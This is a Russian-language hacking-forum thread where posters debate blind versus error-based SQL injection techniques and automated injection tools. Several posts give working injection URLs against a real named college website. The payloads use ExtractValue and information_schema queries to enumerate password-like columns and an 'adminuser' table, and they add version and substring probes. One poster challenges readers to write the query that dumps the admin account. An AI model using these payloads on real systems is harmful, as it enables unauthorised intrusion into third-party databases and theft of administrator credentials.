обычный блайнд крутил. Чо такого. Причем здесь "5-ая ветка" и узнавание "системной информации" при блинде. Ну майлбраш нашел неслепую скулю, мололдчик. Тогда конечно уже другой расклад.

PS: Вообще-то лично я системной информации придаю большое значение, т.к. даже "@@tmpdir: C:\Windows\TEMP" лично мне о многом говорит

Имеются в виду особые методы, позволяющие крутить слепую скулю почти с той же скроростью как и обычную если 5-ая ветка и вывод ошибок присутствуют
https://forum.antichat.ru/showpost.php?p=1494443&postcount=11
https://forum.antichat.ru/showpost.php?p=1494440&postcount=10

2 bons:

Я говорил про тулзу, насколько бы "крутые" методы при блинде не были, автоматизация процесса потребуется по любому. Да, кое-чего в тулзе нет. Но и так бесплатно и многопоточно. Уж извините.

Глупости. Мало того, что это не даёт абсолютно никаких знаний это ещё палит себя кучей запросов ненужных. В данном конкретном случае точно.

Наверное проще получать ту же version() посылая один запрос вместо тупого, да ещё и неоптимального перебора. Как впрочем и остальные данные. Дампить всю базу что-бы получить акк админа это БРЕД. И неоправданное палево. Акк админа получается тремя запросами, а твой софт засрёт все логи

Pashkela, пусть к перспективным методам привыкают А не бездумно пользуются программами.

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

2 jokester:

Скорее всего ты прав. Просто предложил человеку то, что у меня есть на текущий момент, включая первоначальные данные в качестве доказательства. Ничего другого адекватного ему, на мой взгляд сугубо, ему никто не предложил, кроме как "почитать что-то". Вместо того, чтобы новейшие и актуальнейшие методы продемонстрировать на конкретном примере по запросу автора вопроса - на конкретном сайте. Так что считаю в данном случае от меня пользы больше, чем от флуда выше.

Блинда все-таки, а не очередной unhex(hex())

Это не блайнд в том-то всё и дело, а не предложил...

Ну я например уже задолбался одно и то-же из пустого в порожнее, каждый божий день. Вот и не предложил. Читать ведь нехотят. А с твоим софтом и не захотят.

Ок. Предложение:
1
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select group_concat(concat_ws(0x3a,table_schema,table_nam e,column_name)) from information_schema.columns+where+column_name+LIKE+ CHAR(37,112,97,115,37) limit 1)))--+
2
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select+group_concat(co lumn_name)+from+information_schema.columns+where+t able_name='adminuser'+limit+1)))--+

Внимание интрига! Составьте третий запрос сами!!!

Ну нифига себе, до такого ведь обычному читателю этой темы труднова-то будет додуматься (включая меня). Так что конечно риспект Нет бы сразу

Третий запрос наверное такой, извините мне мою наглость:
PS: Аплодирую стоя

http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x3a,(version())))--+
гениально
пашкела, что ты то пытался со своим запросом чудить, ведь мон было просто и так
http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+and+substring(version(),1,1 )=5/**/and/**/'1'='1